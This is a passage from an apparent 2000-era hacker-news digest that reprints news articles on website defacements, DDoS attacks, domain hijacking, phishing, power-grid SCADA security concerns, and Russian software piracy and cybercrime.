cent of the hacking that we encounter is from within the same organisation that we are employed to check," states Ernst & Young (E&Y) national director Sunil Chandiramani. "That is a frightening statistic," he adds. A member of the Cybercop committee of the NASSCOM, Mr Chandiramani is also in the working committee of the Securities and Exchange Board of India (SEBI) on Internet trading surveillance and enforcement related issues. Says Mr Chandiramani:"Most times, we can get into nine of the 10 companies via the Internet and then come back with some souvenir to show that we were there.". E&Y's `eXtreme hacking' is a cutting edge tool and methodology adopted by the firm to defend sites and provide the necessary security solutions. The firm also conducts training sessions to enable corporates double-check their security system and familiarise them with network-based attack and penetration exploits, that hackers may use against their networks. Providing security solutions for a complex world may not be an easy task for it is necessary to assess, architect and implement solutions to protect vital information resources. Hackers have gained prominence for their ability to penetrate hard-to-crack computer centres by exposing an unnoticed vulnerability or by making a clear anti-authority statement and even in some cases, re-designing the front page of the web site. As for the kind of perpetrators? According to a global information security survey conducted by E&Y, 24.8 per cent of the threats facing organisations today come from hackers and 13.9 per cent of the hacking incidents are actuated by competitors. While 7.5 per cent are authorised users of the system, an equally high number of 6.2 per cent are contract workers and consultants. Unauthorised users account for 20.8 per cent of cyber crimes, the survey points out. Though security concerns are "very new here (in India)" with e-commerce merely testing the waters here, attacks into high profile databases are on the increase and are expected to bring to boil a $4 billion content security market in the next couple of years, according to industry estimates. As Mr Chandiramani states, "We don't just go to the firewall and prove that we can break in, but we go into the main computers itself. At times, we deploy staff to get into the EPBX system to get telephone numbers," he said adding, "it is not hard to convince companies of their security loopholes once we have managed to hack into their system." That is not to say that companies have not deployed solutions to counter hacking. Among several corporate houses, Unilever has corporate IT security policies and standards that are applied around the globe, both within the organisation and with their close business associates. ICICI, too, has an established security organisation structure and has developed IT security policy and procedures which are in place. While Hindustan Lever Limited undertakes regular attack and penetration testing, Sprint RPG India Limited has developed policies and procedures for maximising the effectiveness of their IT processes. With borderless transactions getting to be the norm, India will be as vulnerable as any other country to intrusions of this nature. Moreover, with electronic records becoming legally acceptable, there is a growing threat that companies could stand to lose valuable information if adequate care is not taken of the health of the media on which the records are stored. By Amrita Nair-Ghaswalla. (c) 2000 The Times of India Group. TIMES OF INDIA 20/05/2000 @HWA 232.0 [IND] Hackers Shoot, Score On NHL Web Site ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 25 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_052500a_j.shtml 5/25/00 Hackers Shoot, Score On NHL Web Site By Martin Stone, Newsbytes NEW YORK, NEW YORK, U.S.A., 25 May 2000, 6:47 AM CST Officials of the National Hockey League (NHL) and FBI investigators are reportedly attempting to find the culprit or culprits who disabled the league's official Web site in the midst of the Stanley Cup playoffs. An Associated Press report today said it remained uncertain whether hackers cross-checked the site at http://www.NHL.com on Sunday with a Distributed Denial of Service (DDoS) attack, but the results seem similar to the so-called "smurf" invasions that brought down Yahoo, eBay, eTrade, CNN, Amazon.com and other sites in February. The league said it had filed a formal complaint with the FBI in addition to seeking help from security firms to track down the hackers. A league official told AP, "Someone was flooding the pipeline with bogus requests through distributed PCs. The whole system was overloaded. But the intranet was not compromised," he said, referring to the NHL's internal Web network. The spokesman confirmed the site is still experiencing "spotty service", the report said. @HWA 233.0 [IND] Computer whiz alters high school's grades ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 25 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_052500b_j.shtml 5/25/00 Computer Whiz Alters High School's Grades Associated Press - POCATELLO, Idaho _ Someone allegedly hacked into the computer system at Highland High School and changed students' grades. http://www.spokane.net:80/news-story-body.asp?Date=052000&ID=s804878&cat= Computer whiz alters high school's grades Associated Press - "We've had some computer espionage from students," Pocatello School District technology coordinator Bob England said Thursday. "Altering grades. I believe the police are dealing with it." England said the hacker used the district network and software, somehow copied teachers' passwords and logged onto the system. Highland Principal Jeff Taylor said disciplinary action would be taken and that administrators were "treating it as a serious action against school policy." @HWA 234.0 [HNN] Jun 29'00 Australian Tax Office Allegedly Compromised ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by David Australian Federal Police have identified who they say is the person who stole confidential details of thousands of businesses from a government GST website. Several Australian business reported getting strange anonymous emails that contained business phone and fax number as well as bank account details. The site was set up to allow companies to submit their banking details and other information to become accredited suppliers of GST information and assistance packages. The perpetrator told a reporter that he didn't hack or crack into the server, he stumbled upon the information while surfing due to a complete lack of security. He thought he should tell the companies involved which is why he sent the email. The security hole has been blamed on a poorly designed CGI script. The Age news.com.au ZD Net Australian Fairfax IT Sydney Morning Herald http://www.theage.com.au/breaking/0006/29/A40793-2000Jun29.shtml http://www.news.com.au/common/story_page/0,4057,871934%255E2,00.html http://www.zdnet.com.au/zdnn/stories/zdnn_display/au0003700.html http://www.it.fairfax.com.au/breaking/20000629/A40837-2000Jun29.html http://www.smh.com.au/news/0006/29/update/news11.html @HWA 235.0 [HNN] Jun 29'00 AOL Tells FCC That IM Security Is Top Priority ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench In response to the Federal Communications Commission's inquiry on instant messaging, AOL said it supports the interoperability of instant messaging (IM) software but that it must make the privacy and security of instant messages the company's top priority until standards can be developed. Reuters - via Yahoo http://dailynews.yahoo.com/h/nm/20000627/en/online-messaging_1.html @HWA 236.0 [HNN] Jun 29'00 McCain Still Pushing for Filtering ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench The Arizona Republican Senator John McCain is still pushing for content filtering at the nations public libraries. He has added an amendment onto the Labor appropriations bill that requires schools and libraries receiving E-rate funding use filters to block Internet content that is "inappropriate for minors." Wired Summary & Status of S. 3635 http://www.wired.com/news/politics/0,1283,37259,00.html http://thomas.loc.gov/cgi-bin/bdquery/z?d106:SP03635: @HWA 237.0 [HNN] Jun 29'00 Lawsuit Filed Over Nike Redirection ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Weld Pond When Nike's website was redirected by attackers last week it routed the traffic through a small web hosting company. That company is now suing Nike claiming they where negligent in securing their systems. Nike says that if anyone is to blame it is Network Solutions who allowed the redirection to occur in the first place. The perpetrator of the redirection remains unidentified. (Regardless of how this case is decided it will set an interesting precident either way.) Wired http://www.wired.com/news/politics/0,1283,37286,00.html @HWA 238.0 [HNN] Jun 29'00 eCrime Documentary ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench The story of Tim Lloyd, accused and convicted of deleting files and thereby destroying the business of his employer is laid out in a blow by blow fashion in the article. We have reported on Lloyd before and described how he has been found guilty of industrial sabotage of Omega Engineering Corp. Now there is a step by step account of how the Secret Service got their man. CNN http://www.cnn.com/2000/TECH/computing/06/27/omega.files.idg/index.htm l @HWA 239.0 [HNN] Jun 29'00 E-mail Used As Evidence In Korea ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench Officials at the Seoul District Prosecutor's Office said they arrested 32-year-old Kim Sang-hoon, a computer software developer, on charges of violating a law governing information-telecommunications networks. Kim allegedly stole some 4,600 files from a Web-hosting firm's server. One of the witnesses in the case was allowed to send his testimony to the court via email. Korea Herald http://www.koreaherald.co.kr/news/2000/06/__02/20000629_0213.htm @HWA 240.0 [HNN] Jun 30'00 AOL Users Subjected to Social Engineering ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles Two 15-year-olds in Wichita, Kansas allegedly tricked some AOL users into revealing credit card numbers. Victims received an e-mail from "Steve Case" of the "AOL Billing Team" requesting that they go to a web site to update their user information. The requested information included providing a credit card number "that has not been used for any AOL services," the message read. Steve Case, of course, is not a member of any billing teams but rather is AOL's president and CEO. An AOL official said that the company never asks for users' passwords or credit card numbers. APB News http://www.apbnews.com/newscenter/breakingnews/2000/06/29/aolscam0629_ 01.html @HWA 241.0 [HNN] Jun 30'00 ZDNet Launches Echelon Study ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Pyle In a series of articles by Duncan Campbell and other contributors, ZDNet is taking a closer look at the Echelon global spying network. "Echelon: World Under Watch" is a collection of 16 reports that include such topics as proof of Echelon's existence, an explanation of how Echelon works, and various attempts by governments to maintain the secrecy of the project. Public awareness of such far-reaching government snooping capabilities could lead to further efforts by citizens to protect their privacy. ZDNet http://www.zdnet.co.uk/news/specials/2000/06/echelon/ @HWA 242.0 [HNN] Jun 30'00 Interpol and Atomic Tangerine Announce Collaboration ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Weld Pond U.S. venture consulting firm Atomic Tangerine has established a cooperative agreement with Interpol to exchange intelligence on cybercrime. Atomic Tangerine proposes to pass along Interpol's intelligence to any bona fide company free of charge. In exchange, Interpol will have access to information gathered by Atomic Tangerine's "Net Radar." Reuters - via Excite http://news.excite.com/news/r/000629/15/net-security-dc @HWA 243.0 [HNN] Jun 30'00 Survey Results Show That Precautions Lag Concerns ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Apocalypse Dow Consumers and professionals alike are plenty concerned about being victimized by cybercrime, but only a fraction of them use firewalls on their personal computers. Many people surveyed update their antivirus software at least once per month but generally fail to take further precautions. (Why not install a firewall or learn about security before starting a business?) Newsbytes.com http://www.newsbytes.com/pubNews/00/151446.html @HWA 244.0 [HNN] Jun 30'00 Student Confesses to Numerous Private and Government Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles A former computer science student at Northeastern University admitted to computer break-ins at the Defense Logistics Agency, NASA, and the Interior Department among others. The federal prosecutor in the case sought a harsh penalty as discouragement to other such crimes, but under a plea agreement the man will serve a maximum of six months. AP - via Techserver http://www.techserver.com/noframes/story/0,2294,500222509-500318460-50 1790855-0,00.html @HWA 245.0 [HNN] Jun 30'00 Threat From Russia? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Pyle A Thursday New York Times article describes the bleak employment scene in Russia as a perfect breeding ground for cyber-criminals. In a profile of one bored Russian teenager, "Dr. Linux," the article describes instances of internet petty crime as part of a growing interest among Russians with an interest in computers and a lot of free time. Numerous Russians interviewed claimed that the media have exaggerated the importance of recent Russian attacks as part of a "cold war mentality." New York Times - registration required (free) http://www10.nytimes.com/library/tech/00/06/circuits/articles/29hack.h tml @HWA 246.0 [HNN] Jun 30'00 Zines Update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ b0g issue 6 just released! NOV - Issue 9 is out now and still going strong. b0g http://www.b0g.org/ @HWA 247.0 [IND] May 26th: Lights Out ~~~~~~~~~~~~~~~~~~~~~~~~~~ May 26 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_052600a_j.shtml 5/26/00 Lights Out A year in the making, NIPC's Michael Vatis unveils a plan to monitor cyber attacks on the power grid. Is it enough to prevent a blackout? By Kevin Poulsen May 25, 2000 11:36 PM PT The FBI's National Infrastructure Protection Center (NIPC) will be the hub of a nationwide alert network designed to react quickly against cyber attacks targeting the computerized controls of the North American power grid, in a pilot program announced by NIPC chief Michael Vatis to a Senate committee Thursday. Vatis unveiled the "Electrical Power Indications and Warning System" in his written testimony to the full Senate Judiciary committee as it conducted a hearing on cybercrime. "Under the pilot program, electric utility companies and other power entities transmit cyber incident reports to the NIPC," Vatis testified. "These reports are analyzed and assessed to determine whether an NIPC warning, alert, or advisory is warranted to the electric utility community." More>>http://www.securityfocus.com/news/41 Lights Out A year in the making, NIPC's Michael Vatis unveils a plan to monitor cyber attacks on the power grid. Is it enough to prevent a blackout? By Kevin Poulsen May 25, 2000 11:36 PM PT The FBI's National Infrastructure Protection Center (NIPC) will be the hub of a nationwide alert network designed to react quickly against cyber attacks targeting the computerized controls of the North American power grid, in a pilot program announced by NIPC chief Michael Vatis to a Senate committee Thursday. Vatis unveiled the "Electrical Power Indications and Warning System" in his written testimony to the full Senate Judiciary committee as it conducted a hearing on cybercrime. "Under the pilot program, electric utility companies and other power entities transmit cyber incident reports to the NIPC," Vatis testified. "These reports are analyzed and assessed to determine whether an NIPC warning, alert, or advisory is warranted to the electric utility community." The FBI established the program in concert with the North American Electrical Reliability Council (NERC), a not-for-profit industry group that umbrellas electric utilities in the U.S. and Canada. "We've been working with NIPC over the past year, maybe a little longer, to develop the program," said Eugene F. Gorzelnik, NERC's communications director. Gorzelnik said the program is being tested by one of the nine regional councils that make up NERC, but declined to say which one. "They've been working through some of the bugs, and we've had several utilities around the country volunteer to participate as well," Gorzelnik said. NERC formed in the wake of the catastrophic November 9, 1965 blackout that knocked-out power to 30 million people in the Northeastern United States and Ontario, Canada for as long as thirteen hours. Runway landing lights went dark, people were trapped in elevators, traffic snarled at busy intersections that were suddenly left without signals. Decades before buzzwords like "critical infrastructure" and "cyberterrorism" would enter the vernacular, President Lyndon Johnson viewed the blackout as a national security matter and set the FBI and the Pentagon to investigate. Utility engineers eventually traced the genesis of the cascading outage to the failure of a single relay in a transmission line. 'Utility operations personnel interviewed believed that firewalls and dial-back modems were sufficient to protect their systems from intruders.' -- White House report Today, the "Great Northeast Blackout" influences the most popular cyberterror fears. The inevitable hacker-induced blackout goes with the hacker-induced 911 outage as a central doctrine for executive, congressional and industry believers who say that cyberterrorism is a serious and immediate threat to the Western World. National Security Council Terrorism Coordinator Richard Clarke put it this way to the New York Times: "You black out a city, people die. Black out lots of cities, lots of people die. It's as bad as being attacked by bombs." Actual incidents of computer-based attacks against the power grid are hard to find. While the past two decades have seen no shortage of attacks on critical infrastructures -- including a hacker taking over an HBO broadcast through a communications satellite, a group trespassing into the computers controlling a Time Warner cable system, and intruders of all types routinely gaining influence over huge swaths of the telephone network -- tales of intrusions into electric utilities remain apocryphal. An October Wall Street Journal report on the 1995 Dallas "Phone Masters" case included a casual paragraph-eight disclosure that the three hackers involved "had access to portions of the national power grid," but no such charges were filed against the defendants, who admitted to cracking telephone company computers, and the prosecutor on the case denies it. "I don't remember any example of them accessing the power grid," said former Assistant U.S. Attorney Matt Yarbrough, now with a Dallas law firm. The electric industry is closed mouthed on the question. "When it comes to saying something specific about whether anything has happened on the electric system, I don't answer," said Gorzelnik. Asked to what degree the power grid is vulnerable to such an assault, Gorzelnik said, "I just won't answer that question. It's not something that we want to talk about in the press. It doesn't serve any useful purpose." But a detailed 1997 report by the White House's National Security Telecommunications Advisory Committee paints a sobering picture. Open Modems The committee's Electric Power Risk Assessment was conducted at the request of President Clinton, and involved six months of investigation and interviews with workers at eight utilities and three industry groups, including NERC. While the report concluded that physical destruction of electric facilities was a far greater threat than online attacks, it also described a power grid controlled by Byzantine systems riddled with basic security holes. Networks controlling critical portions of the grid were accessible through corporate LANs, the report said. Digital circuit breakers could be remotely tripped by anyone with the right phone number. Fixed passwords for remote vendor access went unchanged for years. Of particular concern to the committee was the widespread use of unsecured supervisory control and data acquisition (SCADA) systems. The SCADA systems consist of central hosts that can monitor and control smaller Remote Terminal Units (RTUs) sprinkled throughout the grid, which in turn control power flow at any given point. Many RTUs in electrical substations were accessible through telephone dial-ups, some of which were protected only with dial-back systems -- modems that call a user back at a pre-programmed number before granting access -- while others lacked even that weak security mechanism and were accessable to anyone who found the telephone number. "An intruder could dial into this port and issue commands to the substation equipment," the report notes. "Open sources, including... electric industry publications, regional maps, and the Internet would provide enough information to identify the most heavily loaded transmission lines and most critical substations in the power grid," reads the report. "Relatively simple hacking techniques could then be used to locate dial-in ports to these points and modify settings to trigger an outage." Overall, the report found that that utility workers "believed that firewalls and dial-back modems were sufficient to protect their systems from intruders, and they were surprised to learn about the experiences of the telecommunications industry with hackers defeating these measures." An engineer with a company that manufactures SCADA systems in use at major electric utilities, speaking on condition that neither he nor his company be identified, said that in recent years the government has spurred electric utilities to increased security. But his company's SCADA products still include dial-up support, and the security features are identical to the ones criticized as weak in the 1997 report. "You can have the remote unit call back to verify that the number is correct," he said. "There are security checks in many areas across the system, via protocols, via passwords... So I'd say it's safe. At least, it's not completely open." "Everything you see in computer security is being applied here. There are utilities that deem it necessary and are applying it. Is every utility applying it? No. But at least [the government] is pushing to see that utilities do it," he said. NERC's Gorzelnik wouldn't comment on whether the power grid is any more secure now than in 1997. The Electrical Power Indications and Warning System does nothing to prevent attacks, but rather provides a channel for electric utilities to report attacks they detect directly to NIPC. "With the information NIPC receives, they'll be able to see if there's any kind of trend developing, to see if there's a more serious problem," said Gorzelnik. "They wouldn't just be looking at the power sector, but also banking, telecommunications and other infrastructure sectors" for signs of a coordinated attack, Gorzelnik said. The program will go nationwide this fall, and in Thursday's testimony Vatis promised the Senate that it will be a model for similar programs to monitor intrusions into other critical infrastructures. "We are currently working with industry on a Indications and Warning model for the telecommunications sector." @HWA 248.0 [IND] May 30th Anti-Metallica Hackers Hit DC Metro Web Site ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 30 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_053000a_j.shtml 5/30/00 Anti-Metallica Hackers Hit DC Metro Web Site By Phuong Ly, Washington Post WASHINGTON, DC, U.S.A., 30 May 2000, 6:14 AM CST A computer hacker vandalized the DC Metro's Web site for at least five hours Monday by replacing transit information with an X-rated message lashing out at recording artists who have filed lawsuits to stop people from swapping music files over the Internet. The attack, the first for Metro, illustrated how vulnerable many public Internet sites have become to being exploited by vandals. Murray Jacobson, manager of Metro's information technology division, said that it was unclear how many users saw the obscene message but that the effect on Metro customers probably was minimal because it occurred on a holiday. On a typical weekday, Metro's Web site records about 200,000 visits, some from people accessing the site more than once, according to Cheryl Johnson, a Metro spokeswoman. The site includes a ride guide with maps to help people plan their commutes, and it also allows passengers to buy "smart cards" that store up to $200 in parking and fares. Jacobson said there appeared to be no security breach enabling the hacker to obtain credit card numbers. "It did not seem like they were out to destroy a computer system," Jacobson said. "They knew what they could get away with quickly." Metro transit police and D.C. police will investigate the incident, which also will be reported to the FBI, Jacobson said. Like many Web sites, Metro might have been hit simply because the hackers - whether youths fooling around on a home computer or people who wanted to make a political statement - thought the site could be disrupted, said Mark Rasch, a former federal prosecutor and security consultant with Reston-based Global Integrity. About 30 to 50 Web sites are hacked each week, he said. "It's just a site of opportunity," Rasch said of the attack on Metro. "Even if you're not doing anything particularly controversial with your Web site, it may be used to make a political statement." In February, some of the Web's most prominent sites - including Yahoo, eBay and Amazon.com - were paralyzed. In April, a 15-year-old Canadian computer whiz known online as "Mafiaboy" was the first person charged in those cyber-strikes. Metro's hackers identified themselves as "Idk2k," or "immortal daemon killers," and started their message with "welcome to the year of knowledge." They called the practice of vandalizing Web sites "lame" but necessary because musicians were suing Napster, a popular computer program that allows people to download music. The profanity-filled message berated the rapper Dr. Dre and the heavy metal band Metallica, who have sued Napster and have been particularly outspoken against the company. Recently, in chat rooms and message boards, hackers have been seething about the lawsuits, Rasch said. But no other attacks concerning Napster have been reported over the weekend, said representatives at the federally funded CERT Coordination Center at Carnegie Mellon University, which monitors hacker attacks and helps develop responses to them. Metro officials discovered that their site had been vandalized about 9:30 a.m. Monday and called in tech support staff to change passwords and restore the site, Jacobson said. By 3 p.m., Metro's site was running properly and the focus turned to finding the culprits and preventing another attack, Jacobson said. Yesterday, Jacobson tried to find a silver lining in the attack. "It's kind of good to know these things happen every once in a while," he said. "It educates our internal users because you know people out there are doing malicious attacks. It's never pleasant, but you want to prepare for the future." Copyright (C) 2000, The Washington Post. Reprinted with permission. @HWA 249.0 [IND] June 1st Hackers Drawn By The Thrills, The Challenge or Just Plain Cash ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 1 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_060100a_j.shtml 6/01/00 Hackers Drawn By The Thrills, The Challenge or Just Plain Cash Experts discuss motives behind cybercrimes By David McHugh Special for USA TODAY MOSCOW -- Alexei of St. Petersburg cracked his first program when he was 12. Frustrated by a game he couldn't win on his parents' computer, which ran on an Intel 8086 microprocessor, he poked around in the game's programming to make it easier. Now 20, the technical institute dropout cracks software to order for $50 to $200, defeating security measures, so illegal copies will run on additional computers. He charged one businessman $50 to crack a $3,000 program for automating embroidering machines. His mother, with whom he lives, doesn't approve. ''So we try not to cross paths on this topic,'' he says. Alexei, who declined to give his last name, swaps pirated software under his nickname, Spot, on closed Internet sites limited to members of his group, ScUM (''I forget what it stands for.''). He has never met most of the members in person. Cracking presents an intellectual pleasure, he says. ''A sporting interest, I would say.'' With many companies reluctant to hurt their reputation by reporting security breaches to police, private systems specialists often lead the uphill fight against hackers. One of them is Sergei Gruzdev, general director for Israeli-based Aladdin Software Security's Moscow office. Gruzdev, who admits he wrote viruses in his student days, says he's shut down 35 Web sites where hackers were sharing cracked software and hacking tools. Usually, a call to the Internet provider supporting the site does the trick. But Gruzdev sicced the police on the United Crackers League, a St. Petersburg-based group that had figured out how to defeat one of Aladdin's security devices. One of its members, Andrei Lishutin, known as Leshy (''Wood devil'' in Russian) was arrested. After that, the group renamed itself United Copyright Protection/Cryptography Labs and says it is now committed to fighting hackers. Hackers, Gruzdev says, ''have the attitude (that) 'I don't want to pay $50 to Bill Gates or to Western bourgeois software developers.' It's the psychology of poor people.'' Some hackers use their skills to make money legally. Aladdin special projects manager Alexei Raevsky, 26, started out by cracking a program for fun when he was a freshman at Moscow's Institute of Physics and Engineering. A classmate handed him a software disk protected by a widely used security program, saying ''You're a hacker, hack this.'' Raevsky, who was writing programs in 10 computer languages by the time he left high school, studied the security measure ''to test my skills. I cracked it, naturally.'' Then he wrote the software maker in Germany, detailing the flaws. The firm responded by giving him contract work and a top-of-the-line laptop computer -- a luxury among Moscow students. Now he drives a Volvo and owns his own apartment, an upper-middle-class standard of living. ''We have the American approach -- if you're so smart, where's your money?'' he says. ''Some waste time on breaking up Web sites, and my attitude is, why do that if there's no money in it?'' @HWA 250.0 [IND] Web Hijackers Pilfer Internet Domain Names ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 1 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_060100b_j.shtml 6/01/00 Web Hijackers Pilfer Internet Domain Names By Ian Karleff TORONTO (Reuters) - Cyberspace hijackers have stolen the Internet domain name Web.net, a hosting site for 700 charities, from its Canadian owners, exposing yet another of the Internet's security flaws and jeopardizing the Web's most valuable property -- your e-identity. ``This looks like international domain name laundering. I think we're going to start seeing more of this,'' said Ken Campbell, president of K.K. Campbell Internet Consulting in Toronto, and the first to discover Web.net's predicament. Earlier this week, hijackers forged, or in Web language ''spoofed,'' Web.net's e-mail account, explained Campbell. The hijackers also made crucial changes to the database of Network Solutions, where Internet addresses are registered, and changed the official owner of Web.net to Billy Tandoko of Jakarta, Indonesia. The hijackers then moved Web.net's registry to a micro-registrar in Toronto and changed the legal owner to Paul Vernon, allegedly of Hong Kong, and rerouted all traffic to reserveme.com. Web.net is still not in control of its Web site, although as of Wednesday reserveme.com began redirecting mail and Web site inquiries back to Web.net's servers, said Tonya Hancherow of Web Networks, the legal owner of Web.net. The same hijackers made similar changes to the ownership of Bali.com, and Campbell has since uncovered one more case of Web site hijacking, but does not think the third case is linked. Hancherow said she can't believe such a breach of security is as easy as spoofing an e-mail account. ``No password was provided and Network Solutions processed the change without consent,'' said Hancherow. The hijackers motives are still a mystery. ``I think I'm witnessing an Internet version of international money laundering, whereby someone is scooping up domain names worth $100,000 each, moves them around so the paper trail is lost, and ends up with substantial assets,'' said Campbell. Hancherow first thought the hijacker was going to try to extort money from Web Networks, but their non-profit status could complicate such a demand. ``The other two options: Is he trying to steal it so he can resell it, or is he just trying to play games to make our lives a bit more difficult?'' said Hancherow. Brian O'Shaughnessy, a spokesman for Network Solutions, told Reuters this type of hijacking has happened at least a dozen times in the past year and Web Networks is a victim of the excessive volume his company is experiencing from people registering domain names. ``A new dot-com is added every 5 seconds. Domain names are a valuable piece of property and that's what people are looking for: a valuable identity on the Internet,'' said O'Shaughnessy. ``The rightful owner still has the domain. An unlawful act has been committed using a hole in the system,'' he added. With the introduction of competition to the domain name registry field in June 1999, a complex layer has been added to the system, making hijacking easier, said O'Shaughnessy. Nevertheless, Campbell believes those businesses that have suffered substantial losses due to hijacking may want to take Network Solutions to court. Campbell warned that there was no longer a central administrator guarding the Internet's security, as there was before 1993, when the Clinton administration transformed the Internet from academic tool to commercial medium. ``They took away those kind of feudal lords and brought in the naked system that is not very secure,'' said Campbell. ``The Internet was based on a co-operative environment, not a fiercely competitive capitalistic environment, and that's why these problems perennially show up.'' @HWA 251.0 [IND] High-Tech Crooks Thrive in Russia ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 2 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_060100c_j.shtml 6/02/00 High-Tech Crooks Thrive in Russia By David McHugh, Special for USA TODAY 06/01/00 MOSCOW - The open-air Gorbushka market is the Alice's Restaurant of software. You can get anything you want. Laid out on tables under the trees of a Moscow park - as if at a huge yard sale - are row upon row of compact discs. The discs are crammed with pirated versions of expensive programs worth hundreds or thousands of dollars. Vendors offer everything from Microsoft's Windows 98 operating system to computer-assisted-design and voice-recognition software. Here, though, they're on sale for 75 rubles, or about $2.75, a disc. It's all illegal, but who's noticing? Russia's anarchic computer culture is fertile ground for hacking, piracy, credit-card fraud and other digital crime. Gorbushka, with its vendors hustling at makeshift tables, is just one of the more obvious examples. Russia has only about 1.5 million Internet users, a small number when compared with the estimated 110 million in the USA. But among them are some of the world's busiest digital vandals, pirates, thieves and spies. Their victims include the wealthy and powerful: Microsoft, whose software is widely pirated here, America Online, the Pentagon, Citibank. Police say the number of computer-related crimes continues to rise in Russia. More than 200 cases were reported in the first three months of this year - more than in all of 1999. Typical computer crimes include stealing credit card numbers sent to online businesses, software piracy, stealing passwords to get free time online and theft of business information. Some examples: Police arrested five suspected hackers accused of stealing credit-card numbers from Internet retailers and pocketing more than $630,000, the ITAR-Tass news agency reported last month. The group, which operated from December to April, stole numbers from more than 5,400 cards belonging mostly to foreigners, police said. Working with an insider, hackers bypassed the security system of the huge natural gas monopoly Gazprom last year and temporarily seized control of the system that regulates gas flows in pipelines, according to the Interior Ministry. Officials did not say whether the break-in caused any damage. A Russian hacker going by the name Maxus distributed more than 25,000 credit-card numbers stolen from an online store, CDUniverse.com. Most of the records were from accounts in the USA, where 65% of the company's customers live. Maxus tried to extort money from the company in January; he sent an e-mail in which he said he had breached the security of a popular credit-card processing program and stole 300,000 customer records. As far as the company knows, he was never caught. Hundreds of PIN codes giving access to credit- and debit-card accounts apparently were stolen in mid-1999 after a security breach at a Moscow card-processing center. Cardholders often had their checking accounts cleaned out in an unusual example of bulk PIN theft. America Online and Compuserve shut down local Internet access numbers in Moscow in 1997 because of what the company called "intolerable levels of fraud." In one of the world's first online theft cases to be prosecuted, Vladimir Levin of St. Petersburg was sentenced to three years in a U.S. prison for stealing $3.7 million from Citibank accounts in 1995 using a personal computer. He was arrested in Britain and extradited to the USA. Hackers apparently working from Russia rummaged in Department of Defense computers for more than a year and stole reams of information. No top-secret material was stolen, the Pentagon says. Computers at NASA and Energy Department nuclear weapons labs also were raided. Investigators don't know who was behind the attack, but some say they suspect Russian intelligence services. Russia's Foreign Intelligence Service has denied it. The agency says it would be too obvious to hack from inside Russia. Why does so much mischief emanate from Russia? The hacker problem begins in school, where hacking habits are rife, Russian computer professionals say. During Soviet times, the government and universities actually encouraged people to copy Western software. Sometimes lacking the printed data that come with store-bought software, people began taking programs apart to see how they worked. "People had to hack programs to learn them and adapt them to Soviet technical conditions," says Mikhail Salnikov, head of Compulog computer consultants and a veteran of the early days of personal computers in Russia. The Soviet government, by copying Western computer technology rather than developing its own versions, was the first hacker, Salnikov says. Combine that with Russia's high level of technical education and the result is a culture in which many people think copying software is no big deal. Those people also have the skills to steal passwords or defeat software security features designed to thwart copying. Maj. Dmitry Chepchugov, head of the Interior Ministry's elite anti-computer crime unit, says poverty plays a role, especially in password theft. "We have many people who need the Internet but don't have the money," he says. So they piggyback on someone else's access. Otherwise honest people, he says, see nothing wrong in illegal copies, especially when a legal copy can cost a month's wages. "It's only in the past four years that people have begun to see the theft of intellectual property as the same as the theft of real property," he says. "It's an intellectual - and a generational - problem." In hopes of wresting some of the bigger customers away from the Gorbushka, manufacturers conduct aggressive education campaigns about software compliance in Russia's corporate sector. However, education among Russian software users might not be enough to stop the threat Russian software thieves present. Macromedia, a San Francisco-based company that produces Web-design software, is not a major player in the Russian market. Still, it can't afford to ignore piracy here. Steve Wozniak, director of the company's anti-piracy programs, says Macromedia software has been sold over the Internet from Russia to customers in the West. Russians also have set up Web sites that give away "cracks" for Macromedia software - essentially providing the intellectual tools for would-be pirates. Russia rivals China for world leadership in software piracy; about 92% of business software running on Russian machines is estimated to be bootleg, according to the Business Software Alliance, a U.S.-based industry group. Recent estimates put the value of the stolen software at $273 million. That's not to say corporations aren't making any money in Russia. "By selling only to 8% of potential customers, Microsoft-Russia sales are about $25 million," says Eugene Danilov, Microsoft-Russia's marketing manager. "Imagine what additional revenue could be generated if piracy was reduced to 80%, 70%." Contributing: Sarah Karush http://www.usatoday.com/life/cyber/tech/cti004.htm 06/01/00- Updated 11:15 AM ET High-tech crooks thrive in Russia By David McHugh, Special for USA TODAY MOSCOW - The open-air Gorbushka market is the 